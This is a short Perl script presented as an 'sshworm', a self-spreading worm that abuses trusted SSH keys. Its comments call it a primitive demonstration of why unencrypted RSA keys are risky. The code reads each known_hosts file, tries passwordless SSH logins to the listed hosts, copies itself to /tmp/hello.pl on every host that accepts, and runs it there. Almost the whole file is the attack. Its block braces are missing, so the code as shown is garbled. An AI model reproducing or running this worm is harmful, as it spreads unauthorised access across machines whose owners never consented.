

# sshworm - example of a trusted host/key ssh worm


# This is extremely primitive and rarely works on anything

# but identical systems running the same versions of ssh.

# It does show how using unencrypted RSA keys for user auth

# across an enterprise can be a really bad thing.  Eventually

# you should be able to let this guy go running as root on any

# given system, it will locate each user's known_hosts and

# attempt to gain accesss, reporting its path to a central system.



use FindBin qw{$Bin};

print ":: sshworm initialized at $Bin\n";

$options = " -o PasswordAuthentication=no ";


# stage 1 - attempt to connect to all hosts in known_hosts files


if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))


	while ($line = <KH>)


		($host, undef) = split(/\s+/,$line);

		($host, undef) = split(/\,/,$host);



	close (KH);


sub Propagate {

	open (SSH, "ssh $options $host 'id' 2>/dev/null|");

	while ($out = <SSH>)


		if ($out =~ /uid/)


			print ":: sshworm found new host $host\n";

			system("scp $Bin/$0 $host:/tmp/hello.pl");

			system("ssh $host 'perl /tmp/hello.pl'");



	close (SSH);
